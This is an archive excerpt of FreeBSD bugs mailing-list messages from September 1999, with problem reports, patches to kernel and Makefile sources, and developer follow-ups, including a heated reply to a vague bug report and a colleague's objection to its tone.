>Description: {null,portal,umap,union}fs are marked as buggy in LINT and not included in GENERIC. They're still built as kld modules and will be loaded automatically if they're mentioned in /etc/fstab. (This actually happened to a friend of mine.) >How-To-Repeat: Add a null filesystem in /etc/fstab. >Fix: Remove them so they're not build in modules: Index: src/sys/modules/Makefile =================================================================== RCS file: /src/fbsd-repository/src/sys/modules/Makefile,v retrieving revision 1.70 diff -u -w -u -w -r1.70 Makefile --- Makefile 1999/08/10 17:15:11 1.70 +++ Makefile 1999/09/09 17:22:52 @@ -1,15 +1,17 @@ # $Id: Makefile,v 1.70 1999/08/10 17:15:11 wpaul Exp $ -# XXX present but broken: atapi ip_mroute_mod joy pcic +# XXX present but broken: atapi ip_mroute_mod joy pcic nullfs portal umapfs union SUBDIR= ax ccd cd9660 coda fdesc fxp if_disc if_ppp if_sl if_tun ipfw \ - kernfs mfs msdos mx nfs ntfs nullfs pn portal procfs sf sk ti \ - tl umapfs union vn vr xl + kernfs mfs msdos mx nfs ntfs pn procfs sf sk ti \ + tl vn vr xl # XXX some of these can move to the general case when de-i386'ed .if ${MACHINE_ARCH} == "i386" SUBDIR+=bktr coff fpu gnufpu ibcs2 linux splash streams \ svr4 syscons vesa vinum .endif >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Sep 9 10:50: 9 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id E1AC21584E for ; Thu, 9 Sep 1999 10:50:04 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id KAA90024; Thu, 9 Sep 1999 10:50:02 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Date: Thu, 9 Sep 1999 10:50:02 -0700 (PDT) Message-Id: <199909091750.KAA90024@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Parag Patel Subject: Re: kern/13546: Too-verbose output from PCI probe at bootup Reply-To: Parag Patel Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR kern/13546; it has been noted by GNATS. From: Parag Patel To: freebsd-gnats-submit@freebsd.org Cc: Subject: Re: kern/13546: Too-verbose output from PCI probe at bootup Date: Thu, 09 Sep 1999 10:41:51 -0700 Here's a better fix. Turns out that this 4xPPro box has two "Orion" chips in it, and the code that picks off the number of subordinate buses returns 255 for whatever reason. The fix is copied from the fixbushigh_450nx() routine into the fixbushigh_orion() routine, which appears to have the same problem. The fix could be made generic and moved out of both bushigh routines if there are no systems out there with 255 subordinate buses. The magic number 255 may mean different things to different chipsets so I settled for this Orion-specific fix. -- Parag Patel *** /sys/pci/pcisupport.c Sat Sep 4 04:02:49 1999 - --- pcisupport.c Wed Sep 8 12:03:00 1999 *************** *** 129,134 **** - --- 129,149 ---- { tag->secondarybus = pci_cfgread(tag, 0x4a, 1); tag->subordinatebus = pci_cfgread(tag, 0x4b, 1); + + if (tag->subordinatebus == 255) { + printf("fixbushigh_orion: bogus highest PCI bus %d", + tag->subordinatebus); + #ifdef NBUS + tag->subordinatebus = NBUS - 2; + #else + tag->subordinatebus = 10; + #endif + printf(", reduced to %d\n", tag->subordinatebus); + } + + if (bootverbose) + printf("fixbushigh_orion: subordinatebus is %d\n", + tag->subordinatebus); } static void To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Sep 9 11: 1:13 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 1915E14BF9 for ; Thu, 9 Sep 1999 11:01:11 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id LAA90913; Thu, 9 Sep 1999 11:00:02 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Date: Thu, 9 Sep 1999 11:00:02 -0700 (PDT) Message-Id: <199909091800.LAA90913@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Assar Westerlund Subject: Re: kern/13666: buggy filesystems are built as modules Reply-To: Assar Westerlund Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR kern/13666; it has been noted by GNATS. From: Assar Westerlund To: freebsd-gnats-submit@freebsd.org Cc: Subject: Re: kern/13666: buggy filesystems are built as modules Date: 09 Sep 1999 19:51:51 +0200 A better way of solving this would of course be to build all the modules but don't install the ones that are considered to be buggy. I don't know how to do this with SUBDIR_CHANGE in the Makefile however. /assar To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Sep 9 11:27:31 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from hhs-mx01.os.dhhs.gov (hhs-mx01.os.dhhs.gov [158.70.254.120]) by hub.freebsd.org (Postfix) with ESMTP id B50541506A for ; Thu, 9 Sep 1999 11:27:19 -0700 (PDT) (envelope-from rdemeyer@os.dhhs.gov) Received: from B11WDC-OV08B.os.dhhs.gov (b11wdc-ov08b.os.dhhs.gov [158.70.253.48]) by hhs-mx01.os.dhhs.gov (8.9.3/8.9.3) with SMTP id OAA17348 for ; Thu, 9 Sep 1999 14:27:36 -0400 (EDT) Received: by B11WDC-OV08B.os.dhhs.gov with VINES-ISMTP; Thu, 9 Sep 1999 14:27:02 -0400 Date: Thu, 9 Sep 1999 14:24:41 -0400 Message-ID: X-Priority: 3 (Normal) To: , Cc: From: "Russell DeMeyere" Reply-To: Subject: Re: misc/13474: Maximum Number of Is Permitted in the .../etc/ X-Incognito-SN: 1361 X-Incognito-Version: 4.25.256 MIME-Version: 1.0 Content-type: text/plain; charset=us-ascii Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Our line length was over 2048 characters. Have since cut it in half and were able to add many IP numbers with out problems. Thank you very much for your help. ------------- Original Text From: "Sheldon Hearn" , on 8/31/1999 5:05 AM: SUBJECT too long. Original SUBJECT is Re: misc/13474: Maximum Number of IPs Permitted in the .../etc/hosts.allow file ---------------------- Original Message Follows ---------------------- On Tue, 31 Aug 1999 09:54:37 +0100, dwmalone@maths.tcd.ie wrote: > I think the tcp wrappers code may have a maximum line length, and rejects > connections if the max line lenght is exceded, to be on the paranoid side. Yep, it's 2048 chars. But If this were the case, I'd expect the error message "missing newline or line too long" to be showing up in syslog messages. My money's on tcpd or linkage. :-) Ciao, Sheldon. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Sep 9 13: 0:50 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 3A8B915642 for ; Thu, 9 Sep 1999 13:00:43 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id NAA02492; Thu, 9 Sep 1999 13:00:03 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Date: Thu, 9 Sep 1999 13:00:03 -0700 (PDT) Message-Id: <199909092000.NAA02492@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Bill Paul Subject: Re: misc/13665: xl driver does not work with 3C900 10-T cards. It only works with 3c90x 10/100 cards Reply-To: Bill Paul Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR misc/13665; it has been noted by GNATS. From: Bill Paul To: dave@dugard.org Cc: freebsd-gnats-submit@FreeBSD.ORG Subject: Re: misc/13665: xl driver does not work with 3C900 10-T cards. It only works with 3c90x 10/100 cards Date: Thu, 9 Sep 1999 15:51:36 -0400 (EDT) Of all the gin joints in all the towns in all the world, dave@dugard.org had to walk into mine and say: > >Number: 13665 > >Category: misc > >Synopsis: xl driver does not work with 3C900 10-T cards. It only works with 3c90x 10/100 cards You know, I scream and yell and harrass people in an attempt to get them to provide accurate and detailed information when they file so-called bug reports, and by now I would have though everyone would have noticed the screaming and yelling and gotten the point. But nooooo.... Well that's just fine. I can scream and yell all day. Just remember: you asked for it. > >Description: > Machine started rebooting What does it say when it reboots! Does it print a panic message?! If so, what!? What does it say when you do a verbose boot?! When exactly does it reboot! Show us what it says on the screen!! Write it down! Set up a serial console! Paint it on a cave wall! Chisel it into a stone tablet! Do *anything* besides just sit there like a bump on a log and complain that "it don't work!" You can't just say "the machine reboots." You have to provide a *DETAILED* description of what you observe. This means write down everything that you see: all the panic messages, all the error messages, all of the things that indicate something has gone wrong. Why? Because I can't see your computer from here, so if you don't explain exactly what happend I can't help you! > right after it looked at the NIC It's not "the NIC." It's a particular model. There are several 3Com 10Mbps-only PCI cards; it's important that I know which one you have. The kernel tells you what model it is when it probes it, then you share this information with us so we know exactly what you're talking about! > after make world and then the kernel config. > After reading /sys/i386/conf/LINT about the MII bus device I guessed > that it might be a problem with 3c900. Well you guessed wrong. I just compiled the -current xl driver and loaded it on my test box with a 3c900-COMBO: xl0: <3Com 3c900-COMBO Etherlink XL> irq 9 at device 13.0 on pci0 xl0: Ethernet address: 00:60:08:08:f5:4a xl0: selecting 10baseT transceiver, half duplex Seems to work fine for me. This means that whatever your problem is, it's more complicated than you make it out to be, which means we need more information, which you didn't provide! Look: the one thing I can't stand is having to go several rounds of e-mail with people in order to painstakingly extract the details about their particular problem. People seem to think it's okay to just post a little blurb first and ask "does anybody have any ideas?", and then, after several hours of interrogation, then finally disclose more details. This is *WRONG*. You want to provide all of the details *UP* *FRONT* so people don't have to go tracking you down trying to get more information out of you! It wastes time! Now I want you to provide more information. I want you to provide it a timely fashion (i.e. within the next 24 hours, not next week or next month, or whenever you feel like it), I want it chock full of details, I want it verbatim without any attempts on your part to interpret, paraphrase or otherwise mangle it, I want it in complete sentences and I want it in 80 columns or less. I don't want you to say things like "I can't remember" or "I forgot to write it down" or "I have to go to Fiji for a week, I'll try it when I get back." Take a memory improvement class, get a pencil and paper, cancel the reservations at the Fiji Hilton, put the card *back* in the machine, recreate the problem and document the crap out of it! -Bill -- ============================================================================= -Bill Paul (212) 854-6020 | System Manager, Master of Unix-Fu Work: wpaul@ctr.columbia.edu | Center for Telecommunications Research Home: wpaul@skynet.ctr.columbia.edu | Columbia University, New York City ============================================================================= "It is not I who am crazy; it is I who am mad!" - Ren Hoek, "Space Madness" ============================================================================= To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Sep 9 13:54:29 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from caspian.plutotech.com (caspian.plutotech.com [206.168.67.80]) by hub.freebsd.org (Postfix) with ESMTP id 3E00A14CEA; Thu, 9 Sep 1999 13:54:22 -0700 (PDT) (envelope-from gibbs@caspian.plutotech.com) Received: from caspian.plutotech.com (localhost [127.0.0.1]) by caspian.plutotech.com (8.9.3/8.9.1) with ESMTP id OAA00621; Thu, 9 Sep 1999 14:54:26 -0600 (MDT) (envelope-from gibbs@caspian.plutotech.com) Message-Id: <199909092054.OAA00621@caspian.plutotech.com> X-Mailer: exmh version 2.0.2 2/24/98 To: Bill Paul Cc: freebsd-bugs@FreeBSD.ORG, committers@FreeBSD.ORG Subject: Re: misc/13665: xl driver does not work with 3C900 10-T cards. It only works with 3c90x 10/100 cards In-reply-to: Your message of "Thu, 09 Sep 1999 13:00:03 PDT." <199909092000.NAA02492@freefall.freebsd.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Thu, 09 Sep 1999 14:54:26 -0600 From: "Justin T. Gibbs" Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > You know, I scream and yell and harrass people in an attempt to get them > to provide accurate and detailed information when they file so-called > bug reports, and by now I would have though everyone would have noticed > the screaming and yelling and gotten the point. But nooooo.... > > Well that's just fine. I can scream and yell all day. Just remember: > you asked for it. No, he didn't ask for "it". He asked for help. Perhaps not in a fashion that makes you feel like helping him, but he certainly didn't ask to hear your tirade about incomplete bug reports. From your own admission, your tone does nothing to encourage people to provide more complete bug reports, so why inflict it on our users and the developers that read the bugs list? As a committer you are representing the FreeBSD Project and this is far from the type of face we wish to show the world. I would personally rather have you not respond to bug reports that aggravate you than to deal with the repercussions of your expressions of anguish. -- Justin To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Sep 9 14: 0:46 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 60BD115181 for ; Thu, 9 Sep 1999 14:00:45 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id OAA12762; Thu, 9 Sep 1999 14:00:01 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Date: Thu, 9 Sep 1999 14:00:01 -0700 (PDT) Message-Id: <199909092100.OAA12762@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Nicolas Souchu Subject: Re: kern/10701: ppbus printing problems Reply-To: Nicolas Souchu Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR kern/10701; it has been noted by GNATS. From: Nicolas Souchu To: freebsd-gnats-submit@freebsd.org, drwho@xnet.com Cc: Subject: Re: kern/10701: ppbus printing problems Date: Thu, 09 Sep 1999 21:02:18 +0000 So, shall I close the PR? -- nsouch@free.fr / nsouch@freebsd.org FreeBSD - Turning PCs into workstations - http://www.FreeBSD.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Sep 9 14: 9:14 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 9DF7414C8A; Thu, 9 Sep 1999 14:09:12 -0700 (PDT) (envelope-from nectar@FreeBSD.org) Received: (from nectar@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id OAA13649; Thu, 9 Sep 1999 14:08:57 -0700 (PDT) (envelope-from nectar@FreeBSD.org) Date: Thu, 9 Sep 1999 14:08:57 -0700 (PDT) From: Message-Id: <199909092108.OAA13649@freefall.freebsd.org> To: don@whtech.com, nectar@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: kern/8703: NFS Freezes when copying files from 3.0 to earlier release Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: NFS Freezes when copying files from 3.0 to earlier release State-Changed-From-To: open->closed State-Changed-By: nectar State-Changed-When: Thu Sep 9 14:08:11 PDT 1999 State-Changed-Why: No response from originator after 10 months. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Sep 9 14:10: 6 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id AD4E9152EB for ; Thu, 9 Sep 1999 14:10:04 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id OAA13764; Thu, 9 Sep 1999 14:10:01 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Date: Thu, 9 Sep 1999 14:10:01 -0700 (PDT) Message-Id: <199909092110.OAA13764@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Nicolas Souchu Subject: Re: i386/12771: lpt hangs and never works again, even after reboot Reply-To: Nicolas Souchu Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR i386/12771; it has been noted by GNATS. From: Nicolas Souchu To: freebsd-gnats-submit@freebsd.org, jrosemar@unix01.voicenet.com, nsouch@freebsd.org Cc: Subject: Re: i386/12771: lpt hangs and never works again, even after reboot Date: Thu, 09 Sep 1999 21:12:20 +0000 > Description > > /dev/lpt1 hangs for some reson or another, and refuses to > ever work again. This is a polled port (no IRQ). > What's your dmesg output? > How-To-Repeat > > Not exactly sure. I can do it here by leaving the device > connected to the port turned off and trying to send to it, > but you don't have this device. Anyway, the port seems > permanently locked up and useless at this time. > > Not enough accurate. What's the peripheral? > Fix > > What makes FreeBSD think /dev/lpt1 is busy? > > Submit Followup > ------------------------------------------------------------------------ > www@freebsd.org -- nsouch@free.fr / nsouch@freebsd.org FreeBSD - Turning PCs into workstations - http://www.FreeBSD.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Sep 9 17: 0:43 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id B6E1214D34 for ; Thu, 9 Sep 1999 17:00:41 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id RAA28083; Thu, 9 Sep 1999 17:00:04 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Date: Thu, 9 Sep 1999 17:00:04 -0700 (PDT) Message-Id: <199909100000.RAA28083@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Shell Shock Subject: Re: kern/4454: X drops characters/locks up keyboard when run from `xdm' Reply-To: Shell Shock Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR kern/4454; it has been noted by GNATS. From: Shell Shock To: freebsd-gnats-submit@freebsd.org, atrens@nortel.ca Cc: Subject: Re: kern/4454: X drops characters/locks up keyboard when run from `xdm' Date: Thu, 09 Sep 1999 18:56:04 -0500 This also happens with > wdm < as well as xdm, im not sure about the motherboard, but its not ASUS for sure ;) if you've gotten anywhere with this, please reply to me Kyle Martin shellshock@rockford.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Sep 9 17:20:23 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 1722E1579C for ; Thu, 9 Sep 1999 17:20:22 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id RAA29563; Thu, 9 Sep 1999 17:20:02 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Date: Thu, 9 Sep 1999 17:20:02 -0700 (PDT) Message-Id: <199909100020.RAA29563@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Bill Fenner Subject: Re: conf/13652: Bug in /etc/protocols Reply-To: Bill Fenner Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR conf/13652; it has been noted by GNATS. From: Bill Fenner To: dan@obluda.cz Cc: freebsd-gnats-submit@freebsd.org Subject: Re: conf/13652: Bug in /etc/protocols Date: Thu, 9 Sep 1999 17:10:09 -0700 FYI, -current and -stable have protocols up to 121. Bill To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Sep 9 18:40:19 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 6C43115C7D for ; Thu, 9 Sep 1999 18:40:17 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id SAA37298; Thu, 9 Sep 1999 18:40:03 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Date: Thu, 9 Sep 1999 18:40:03 -0700 (PDT) Message-Id: <199909100140.SAA37298@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: "James A Hunsaker IV" Subject: Re: kern/13630: system halts after npx0 detected on 3.2 install Reply-To: "James A Hunsaker IV" Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR kern/13630; it has been noted by GNATS. From: "James A Hunsaker IV" To: , Cc: Subject: Re: kern/13630: system halts after npx0 detected on 3.2 install Date: Thu, 9 Sep 1999 20:32:24 -0500 Tried using the 3.3 RC floppies and it booted the first time fine, however I had to quit the install. When I tried booting using the same identical floppies an hour later, the old behavior came back. It still freezes after displaying npx0 on motherboard npx0: INT 16 interface I configured the kernel EXACTLY the same way I did before when it worked. Also, I notice that before the install program comes up, it reports that RTC? memory doesn't match up with bios memory so using bios instead. It reports this twice, but I can't get the exact error because it goes so fast. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Sep 9 18:40:22 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 3365315C69 for ; Thu, 9 Sep 1999 18:40:17 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id SAA37290; Thu, 9 Sep 1999 18:40:02 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Date: Thu, 9 Sep 1999 18:40:02 -0700 (PDT) Message-Id: <199909100140.SAA37290@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Bill Fenner Subject: Re: kern/13049: [PATCH] NFS replies with incorrect source IP Reply-To: Bill Fenner Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR kern/13049; it has been noted by GNATS. From: Bill Fenner To: iedowse@maths.tcd.ie Cc: freebsd-gnats-submit@freebsd.org Subject: Re: kern/13049: [PATCH] NFS replies with incorrect source IP Date: Thu, 9 Sep 1999 18:30:11 -0700 > NFS over UDP uses just one socket to send and receive, so it can > neither determine at which local IP a request was directed Can't it use IP_RECVDSTADDR? > nor control from which IP the reply is sent. You could rebind the socket before & after sending each reply. That's probably a high enough overhead that multiple sockets is the right way to go anyway. BIll To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Sep 9 20: 8:43 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (Postfix) with ESMTP id 2F76C14D00 for ; Thu, 9 Sep 1999 20:08:41 -0700 (PDT) (envelope-from wollman@khavrinen.lcs.mit.edu) Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.9.1/8.9.1) id XAA23880; Thu, 9 Sep 1999 23:08:30 -0400 (EDT) (envelope-from wollman) Date: Thu, 9 Sep 1999 23:08:30 -0400 (EDT) From: Garrett Wollman Message-Id: <199909100308.XAA23880@khavrinen.lcs.mit.edu> To: Bill Fenner Cc: freebsd-bugs@FreeBSD.ORG Subject: Re: kern/13049: [PATCH] NFS replies with incorrect source IP In-Reply-To: <199909100140.SAA37290@freefall.freebsd.org> References: <199909100140.SAA37290@freefall.freebsd.org> Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org < said: > Can't it use IP_RECVDSTADDR? [...] > You could rebind the socket before & after sending each reply. That's > probably a high enough overhead that multiple sockets is the right way > to go anyway. Actually, the real Right Thing for all such cases is to fix the broken API so that datagram-oriented applications can specify the entire UDP address tuple concurrently with sending the packet. Probably something along the lines of IP_HDRINCL is best (which would be in keeping with the ALF concept). -GAWollman -- Garrett A. Wollman | O Siem / We are all family / O Siem / We're all the same wollman@lcs.mit.edu | O Siem / The fires of freedom Opinions not those of| Dance in the burning flame MIT, LCS, CRS, or NSA| - Susan Aglukark and Chad Irschick To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Sep 9 21: 1:32 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 0B16014FCE for ; Thu, 9 Sep 1999 21:01:31 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id VAA55657; Thu, 9 Sep 1999 21:00:01 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (Postfix) with ESMTP id 6ADB414C37 for ; Thu, 9 Sep 1999 20:50:40 -0700 (PDT) (envelope-from wollman@khavrinen.lcs.mit.edu) Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.9.1/8.9.1) id XAA24216; Thu, 9 Sep 1999 23:50:40 -0400 (EDT) (envelope-from wollman) Message-Id: <199909100350.XAA24216@khavrinen.lcs.mit.edu> Date: Thu, 9 Sep 1999 23:50:40 -0400 (EDT) From: Garrett Wollman Reply-To: wollman@khavrinen.lcs.mit.edu To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: bin/13676: usr.bin/more/Makefile is broken Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 13676 >Category: bin >Synopsis: usr.bin/more/Makefile is broken >Confidential: no >Severity: critical >Priority: high >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Thu Sep 9 21:00:00 PDT 1999 >Closed-Date: >Last-Modified: >Originator: Garrett Wollman >Release: FreeBSD 3.0-CURRENT i386 >Organization: MIT Lab for Computer Science >Environment: -current sources as of 8 September 1999 >Description: more's Makefile erroneously uses ${ECHO} >How-To-Repeat: cd /usr/src/usr.bin/more; make -s >Fix: Index: Makefile =================================================================== RCS file: /home/cvs/src/usr.bin/more/Makefile,v retrieving revision 1.8 diff -u -r1.8 Makefile --- Makefile 1999/09/03 22:31:13 1.8 +++ Makefile 1999/09/10 03:44:56 @@ -16,12 +16,12 @@ EXAMPLES= default.morerc less.morerc most.morerc defrc.h: default.morerc - @${ECHO} '/* ${.TARGET:T} auto-generated from ${.ALLSRC:T} */' \ + echo '/* ${.TARGET:T} auto-generated from ${.ALLSRC:T} */' \ > ${.TARGET} - @${ECHO} '#define DEFRC "\' >> ${.TARGET} + echo '#define DEFRC "\' >> ${.TARGET} sed -e 's/\\/\\\\/g' -e 's/\"/\\\"/g' -e 's/$$/\\n\\/' \ < ${.ALLSRC} >> ${.TARGET} - @${ECHO} \" >> ${.TARGET} + echo \" >> ${.TARGET} beforeinstall: ${INSTALL} ${COPY} -o ${SHAREOWN} -g ${SHAREGRP} -m ${SHAREMODE} \ >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Sep 9 23:32:42 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from storm.FreeBSD.org.uk (storm.freebsd.org.uk [194.242.128.198]) by hub.freebsd.org (Postfix) with ESMTP id B6E8E153AD; Thu, 9 Sep 1999 23:32:37 -0700 (PDT) (envelope-from brian@Awfulhak.org) Received: from keep.lan.Awfulhak.org (root@localhost [127.0.0.1]) by storm.FreeBSD.org.uk (8.9.3/8.9.3) with ESMTP id HAA84680; Fri, 10 Sep 1999 07:31:29 +0100 (BST) (envelope-from brian@Awfulhak.org) Received: from keep.lan.Awfulhak.org (brian@localhost.lan.Awfulhak.org [127.0.0.1]) by keep.lan.Awfulhak.org (8.9.3/8.9.3) with ESMTP id GAA35621; Fri, 10 Sep 1999 06:41:27 +0100 (BST) (envelope-from brian@keep.lan.Awfulhak.org) Message-Id: <199909100541.GAA35621@keep.lan.Awfulhak.org> X-Mailer: exmh version 2.0.2 2/24/98 To: Joel Ray Holveck Cc: Eivind Eklund , Brian Somers , ru@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: bin/7669: libalias does not IRC DCC packets under certain conditions In-reply-to: Your message of "09 Sep 1999 12:54:32 CDT." <864sh4m0me.fsf@detlev.UUCP> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Fri, 10 Sep 1999 06:41:27 +0100 From: Brian Somers Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org [.....] > > (I have nothing approaching an easy way of testing the patch beyond > > compilation, since I don't use NAT for any of my own boxes anymore). > > I do. I disagree with the patch, though, but could be convinced to > apply and test it. (My NAT is presently running 2.2.8, and I'd rather > not upgrade it on a whim. However, if we need a tester, then I can > upgrade it (which I've been needing to do anyway).) Well, it seems you know a great deal more about this IRC stuff than I do, so I'm happy if you decide whether the patch has a chance of working, and if it's worth testing. From the sounds of it it hasn't and isn't, so I'll silently duck back into my little corner and place the patch in the bit-bucket :-I > joelh > > -- > Joel Ray Holveck - joelh@gnu.org > Fourth law of programming: > Anything that can go wrong wi > sendmail: segmentation violation - core dumped -- Brian Don't _EVER_ lose your sense of humour ! To Unsubscribe: send mail to 